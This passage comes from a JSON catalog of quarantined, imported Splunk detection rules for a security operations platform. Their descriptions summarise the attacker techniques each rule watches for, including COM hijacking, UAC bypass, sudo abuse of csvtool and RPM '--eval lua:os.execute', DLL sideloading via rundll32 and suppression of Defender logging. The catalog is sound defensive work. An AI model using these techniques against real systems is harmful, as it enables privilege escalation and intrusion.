"medium", "category": "_quarantine", "mitre_techniques": [ "T1546.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-event-triggered-image-file-execution-options-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f7abfab9-12ea-44e8-8745-475f9ca6e0a4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_event_triggered_image_file_execution_options_injection.yml" } }, { "id": "splunk-security-content-f7bb956f-b956-42a5-8c2c-ff9cdbbf7526", "type": "detection", "name": "Windows SpeechRuntime Suspicious Child Process", "description": "SpeechRuntime is vulnerable to an attack that allows a user to run code on another user's session remotely and stealthily by exploiting a Windows COM class. When this class is invoked, it launches SpeechRuntime.exe in the context of the currently logged-on user. Because this COM class is susceptible to COM Hijacking, the attacker can alter the registry remotely to point to a malicious DLL. By dropping that DLL on the target system (e.g., via SMB) and triggering the COM object, the attacker causes the malicious DLL to load into SpeechRuntime.exe and executing under the user's context. This detection identifies suspicious child processes of SpeechRuntime.exe that could indicate abuse of this vulnerability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-speechruntime-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f7bb956f-b956-42a5-8c2c-ff9cdbbf7526", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_speechruntime_suspicious_child_process.yml" } }, { "id": "splunk-security-content-f7da5fca-9261-43de-a4d0-130dad1e4f4d", "type": "detection", "name": "Windows Impair Defense Change Win Defender Throttle Rate", "description": "The following analytic detects modifications to the ThrottleDetectionEventsRate registry setting in Windows Defender. It leverages data from the Endpoint.Registry datamodel to identify changes in the registry path related to Windows Defender's event logging rate. This activity is significant because altering the ThrottleDetectionEventsRate can reduce the frequency of logged detection events, potentially masking malicious activities. If confirmed malicious, this could allow an attacker to evade detection by decreasing the visibility of security events, thereby hindering incident response and forensic investigations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-change-win-defender-throttle-rate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f7da5fca-9261-43de-a4d0-130dad1e4f4d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_change_win_defender_throttle_rate.yml" } }, { "id": "splunk-security-content-f7e5e792-d907-46c1-a58e-4ff974dc462a", "type": "detection", "name": "Cisco Secure Firewall - Connection to File Sharing Domain", "description": "The following analytic detects outbound connections to commonly abused file sharing and pastebin-style hosting domains. It leverages Cisco Secure Firewall Threat Defense logs and focuses on allowed connections (action=Allow) where the url field matches a list of known data hosting or temporary storage services. While many of these platforms serve legitimate purposes, they are frequently leveraged by adversaries for malware delivery, data exfiltration, command and control (C2) beacons, or staging of encoded payloads. This analytic is valuable for identifying potential abuse of legitimate infrastructure as part of an attacker's kill chain. If confirmed malicious, this activity may indicate tool staging, credential dumping, or outbound data leaks over HTTP(S).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1090.002", "T1105", "T1567.002", "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-connection-to-file-sharing-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f7e5e792-d907-46c1-a58e-4ff974dc462a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___connection_to_file_sharing_domain.yml" } }, { "id": "splunk-security-content-f7eda4bc-871c-11eb-b110-acde48001122", "type": "detection", "name": "Process Deleting Its Process File Path", "description": "The following analytic identifies a process attempting to delete its own file path, a behavior often associated with defense evasion techniques. This detection leverages Sysmon EventCode 1 logs, focusing on command lines executed via cmd.exe that include deletion commands. This activity is significant as it may indicate malware, such as Clop ransomware, trying to evade detection by removing its executable file if certain conditions are met. If confirmed malicious, this could allow the attacker to persist undetected, complicating incident response and remediation efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/process-deleting-its-process-file-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f7eda4bc-871c-11eb-b110-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/process_deleting_its_process_file_path.yml" } }, { "id": "splunk-security-content-f7f7456b-470d-4a95-9703-698250645ff4", "type": "detection", "name": "Windows Powershell RemoteSigned File", "description": "The following analytic identifies the use of the \"remotesigned\" execution policy for PowerShell scripts. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions containing \"remotesigned\" and \"-File\". This activity is significant because the \"remotesigned\" policy allows locally created scripts to run without restrictions, posing a potential security risk. If confirmed malicious, an attacker could execute unauthorized scripts, leading to code execution, privilege escalation, or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-remotesigned-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f7f7456b-470d-4a95-9703-698250645ff4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_remotesigned_file.yml" } }, { "id": "splunk-security-content-f8384f9e-1a5c-4c3a-96d6-8a7e5a38a8b8", "type": "detection", "name": "Linux Csvtool Privilege Escalation", "description": "The following analytic detects the execution of the 'csvtool' command with 'sudo' privileges, which can allow a user to run system commands as root. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because it indicates a potential privilege escalation attempt, where a user could gain unauthorized root access. If confirmed malicious, this could lead to full system compromise, allowing an attacker to execute arbitrary commands, escalate privileges, and maintain persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-csvtool-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f8384f9e-1a5c-4c3a-96d6-8a7e5a38a8b8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_csvtool_privilege_escalation.yml" } }, { "id": "splunk-security-content-f86a8ec9-b042-45eb-92f4-e9ed1d781078", "type": "detection", "name": "Cloud Provisioning Activity From Previously Unseen IP Address", "description": "The following analytic detects cloud provisioning activities originating from previously unseen IP addresses. It leverages cloud infrastructure logs to identify events where resources are created or started, and cross-references these with a baseline of known IP addresses. This activity is significant as it may indicate unauthorized access or potential misuse of cloud resources. If confirmed malicious, an attacker could gain unauthorized control over cloud resources, leading to data breaches, service disruptions, or increased operational costs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-provisioning-activity-from-previously-unseen-ip-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f86a8ec9-b042-45eb-92f4-e9ed1d781078", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_provisioning_activity_from_previously_unseen_ip_address.yml" } }, { "id": "splunk-security-content-f87aa96b-369b-4a3e-9021-1bbacbfcb8fb", "type": "detection", "name": "Windows Driver Inventory", "description": "The following analytic identifies drivers being loaded across the fleet. It leverages a PowerShell script input deployed to critical systems to capture driver data. This detection is significant as it helps monitor for unauthorized or malicious drivers that could compromise system integrity. If confirmed malicious, such drivers could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-driver-inventory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f87aa96b-369b-4a3e-9021-1bbacbfcb8fb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_driver_inventory.yml" } }, { "id": "splunk-security-content-f87b5062-b405-11eb-a889-acde48001122", "type": "detection", "name": "CMLUA Or CMSTPLUA UAC Bypass", "description": "The following analytic detects the use of COM objects like CMLUA or CMSTPLUA to bypass User Account Control (UAC). It leverages Sysmon EventCode 7 to identify the loading of specific DLLs (CMLUA.dll, CMSTPLUA.dll, CMLUAUTIL.dll) by processes not typically associated with these libraries. This activity is significant as it indicates an attempt to gain elevated privileges, a common tactic used by ransomware adversaries. If confirmed malicious, this could allow attackers to execute code with administrative rights, leading to potential system compromise and further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cmlua-or-cmstplua-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f87b5062-b405-11eb-a889-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml" } }, { "id": "splunk-security-content-f8a22586-ee2d-11eb-a193-acde48001122", "type": "detection", "name": "Rundll32 CreateRemoteThread In Browser", "description": "The following analytic detects the suspicious creation of a remote thread by rundll32.exe targeting browser processes such as firefox.exe, chrome.exe, iexplore.exe, and microsoftedgecp.exe. This detection leverages Sysmon EventCode 8, focusing on SourceImage and TargetImage fields to identify the behavior. This activity is significant as it is commonly associated with malware like IcedID, which hooks browsers to steal sensitive information such as banking details. If confirmed malicious, this could allow attackers to intercept and exfiltrate sensitive user data, leading to potential financial loss and privacy breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-createremotethread-in-browser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f8a22586-ee2d-11eb-a193-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_createremotethread_in_browser.yml" } }, { "id": "splunk-security-content-f8b482f4-6d62-49fa-a905-dfa15698317b", "type": "detection", "name": "Windows Powershell Cryptography Namespace", "description": "The following analytic detects suspicious PowerShell script execution involving the cryptography namespace via EventCode 4104. It leverages PowerShell Script Block Logging to identify scripts using cryptographic functions, excluding common hashes like SHA and MD5. This activity is significant as it is often associated with malware that decrypts or decodes additional malicious payloads. If confirmed malicious, this could allow an attacker to execute further code, escalate privileges, or establish persistence within the environment. Analysts should investigate the parent process, decrypted data, network connections, and the user executing the script.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-cryptography-namespace.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f8b482f4-6d62-49fa-a905-dfa15698317b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_cryptography_namespace.yml" } }, { "id": "splunk-security-content-f8ba49e7-ffd3-4b53-8f61-e73974583c5d", "type": "detection", "name": "Azure AD Service Principal Created", "description": "The following analytic detects the creation of a Service Principal in an Azure AD environment. It leverages Azure Active Directory events ingested through EventHub, specifically monitoring the \"Add service principal\" operation. This activity is significant because Service Principals can be used by adversaries to establish persistence and bypass multi-factor authentication and conditional access policies. If confirmed malicious, this could allow attackers to maintain single-factor access to the Azure AD environment, potentially leading to unauthorized access to resources and prolonged undetected activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-service-principal-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f8ba49e7-ffd3-4b53-8f61-e73974583c5d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_service_principal_created.yml" } }, { "id": "splunk-security-content-f8c325ea-506e-4105-8ccf-da1492e90115", "type": "detection", "name": "Linux Auditd Add User Account Type", "description": "The following analytic detects the suspicious add user account type. This behavior is critical for a SOC to monitor because it may indicate attempts to gain unauthorized access or maintain control over a system. Such actions could be signs of malicious activity. If confirmed, this could lead to serious consequences, including a compromised system, unauthorized access to sensitive data, or even a wider breach affecting the entire network. Detecting and responding to these signs early is essential to prevent potential security incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-add-user-account-type.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f8c325ea-506e-4105-8ccf-da1492e90115", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_add_user_account_type.yml" } }, { "id": "splunk-security-content-f8db6e0b-55bb-40ca-bc85-2b3700adb0f8", "type": "detection", "name": "MacOS List Firewall Rules", "description": "This analytic detects attempts to enumerate or verify the configuration of the macOS application firewall.\nSpecifically, it monitors executions of `defaults read /Library/Preferences/com.apple.alf` and `/usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate`.\nThese commands provide insight into firewall status, allowed applications, and explicit authorization rules.\nWhile they are legitimate administrative operations, adversaries may leverage them to identify potential attack surfaces, determine whether the firewall is active, or enumerate allowed network flows.\nMonitoring for these commands, particularly when executed by non-administrative users or at unusual times, can provide early indication of reconnaissance activity on macOS endpoints", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/macos-list-firewall-rules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f8db6e0b-55bb-40ca-bc85-2b3700adb0f8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_list_firewall_rules.yml" } }, { "id": "splunk-security-content-f8e58a23-cecd-495f-9c65-6c76b4cb9774", "type": "detection", "name": "Linux RPM Privilege Escalation", "description": "The following analytic detects the execution of the RPM Package Manager with elevated privileges, specifically when it is used to run system commands as root via the `--eval` and `lua:os.execute` options. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process metadata. This activity is significant because it indicates a potential privilege escalation attempt, allowing a user to gain root access. If confirmed malicious, this could lead to full system compromise, unauthorized access to sensitive data, and further exploitation of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-rpm-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f8e58a23-cecd-495f-9c65-6c76b4cb9774", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_rpm_privilege_escalation.yml" } }, { "id": "splunk-security-content-f92d74f2-4921-11ec-b685-acde48001122", "type": "detection", "name": "System Info Gathering Using Dxdiag Application", "description": "The following analytic identifies the execution of the dxdiag.exe process with specific command-line arguments, which is used to gather system information. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line details. This activity is significant because dxdiag.exe is rarely used in corporate environments and its execution may indicate reconnaissance efforts by malicious actors. If confirmed malicious, this activity could allow attackers to collect detailed system information, aiding in further exploitation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1592" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/system-info-gathering-using-dxdiag-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f92d74f2-4921-11ec-b685-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/system_info_gathering_using_dxdiag_application.yml" } }, { "id": "splunk-security-content-f9593331-804c-4268-8b4c-2693c5ae786c", "type": "detection", "name": "Windows Rundll32 Execution With Log.DLL", "description": "Identifies the execution of rundll32 with a command line argument of \"log.dll\", as used in the Lotus Blossom Chrysalis backdoor campaign.\nAttackers placed a malicious \"log.dll\" in \"%AppData%\\Bluetooth\" and invoked it via rundll32.exe \"log.dll,LogInit\" to decrypt and execute ShellCode.\nThe legitimate Bitdefender Submission Wizard (BDSubmit.exe, bdsw.exe) also uses log.dll and is vulnerable to DLL sideloading.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rundll32-execution-with-log-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f9593331-804c-4268-8b4c-2693c5ae786c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rundll32_execution_with_log_dll.yml" } }, { "id": "splunk-security-content-f9cadf4e-df22-4f4e-a08f-9d3344c2165d", "type": "detection", "name": "Kubernetes Scanning by Unauthenticated IP Address", "description": "The following analytic identifies potential scanning activities within a Kubernetes environment by unauthenticated IP addresses. It leverages Kubernetes audit logs to detect multiple unauthorized access attempts (HTTP 403 responses) from the same source IP. This activity is significant as it may indicate an attacker probing for vulnerabilities or attempting to exploit known issues. If confirmed malicious, such scanning could lead to unauthorized access, data breaches, or further exploitation of the Kubernetes infrastructure, compromising the security and integrity of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-scanning-by-unauthenticated-ip-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f9cadf4e-df22-4f4e-a08f-9d3344c2165d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_scanning_by_unauthenticated_ip_address.yml" } }, { "id": "splunk-security-content-fa1c3040-4680-11ec-a618-3e22fbd008af", "type": "detection", "name": "Remote Process Instantiation via DCOM and PowerShell Script Block", "description": "The following analytic detects the execution of PowerShell commands that initiate a process on a remote endpoint via the DCOM protocol. It leverages PowerShell Script Block Logging (EventCode=4104) to identify the use of ShellExecute and ExecuteShellCommand. This activity is significant as it may indicate lateral movement or remote code execution attempts by adversaries. If confirmed malicious, this behavior could allow attackers to execute arbitrary code on remote systems, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-dcom-and-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fa1c3040-4680-11ec-a618-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_dcom_and_powershell_script_block.yml" } }, { "id": "splunk-security-content-fa4089e2-50e3-40f7-8469-d2cc1564ca59", "type": "detection", "name": "Cloud Compute Instance Created In Previously Unused Region", "description": "The following analytic detects the creation of a cloud compute instance in a region that has not been previously used within the last hour. It leverages cloud infrastructure logs and compares the regions of newly created instances against a lookup file of historically used regions. This activity is significant because the creation of instances in new regions can indicate unauthorized or suspicious activity, such as an attacker attempting to evade detection or establish a foothold in a less monitored area. If confirmed malicious, this could lead to unauthorized resource usage, data exfiltration, or further compromise of the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1535" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-compute-instance-created-in-previously-unused-region.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fa4089e2-50e3-40f7-8469-d2cc1564ca59", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_compute_instance_created_in_previously_unused_region.yml" } }, { "id": "splunk-security-content-fa6142a7-c364-4d11-9954-895dd9efb2d4", "type": "detection", "name": "Windows DISM Install PowerShell Web Access", "description": "The following analytic detects the installation of PowerShell Web Access using the Deployment Image Servicing and Management (DISM) tool. It leverages Sysmon EventID 1 to identify the execution of `dism.exe` with specific parameters related to enabling the WindowsPowerShellWebAccess feature. This activity is significant because enabling PowerShell Web Access can facilitate remote execution of PowerShell commands, potentially allowing an attacker to gain unauthorized access to systems and networks. If confirmed malicious, this action could lead to further exploitation and compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dism-install-powershell-web-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fa6142a7-c364-4d11-9954-895dd9efb2d4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dism_install_powershell_web_access.yml" } }, { "id": "splunk-security-content-fa7ca5c6-c9d8-11eb-bce9-acde48001122", "type": "detection", "name": "Permission Modification using Takeown App", "description": "The following analytic detects the modification of file or directory permissions using the takeown.exe Windows application. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include process GUID, process name, and command-line details. This activity is significant because it is a common technique used by ransomware to take ownership of files or folders for encryption or deletion. If confirmed malicious, this could lead to unauthorized access, data encryption, or data destruction, severely impacting the integrity and availability of critical data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/permission-modification-using-takeown-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fa7ca5c6-c9d8-11eb-bce9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/permission_modification_using_takeown_app.yml" } }, { "id": "splunk-security-content-fa90f372-f91d-11eb-816c-acde48001122", "type": "detection", "name": "Rundll32 LockWorkStation", "description": "The following analytic detects the execution of the rundll32.exe command with the user32.dll,LockWorkStation parameter, which is used to lock the workstation via command line. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it is an uncommon method to lock a screen and has been observed in CONTI ransomware tooling for defense evasion. If confirmed malicious, this technique could indicate an attempt to evade detection and hinder incident response efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-lockworkstation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fa90f372-f91d-11eb-816c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_lockworkstation.yml" } }, { "id": "splunk-security-content-fabd364e-04f3-11ec-b34b-acde48001122", "type": "detection", "name": "GetWmiObject DS User with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-WmiObject` cmdlet with the `DS_User` class parameter via PowerShell Script Block Logging (EventCode=4104). It leverages logs to identify attempts to query all domain users using WMI. This activity is significant as it may indicate an adversary or Red Team operation attempting to enumerate domain users for situational awareness and Active Directory discovery. If confirmed malicious, this behavior could lead to further reconnaissance, enabling attackers to map out the network and identify potential targets for privilege escalation or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": 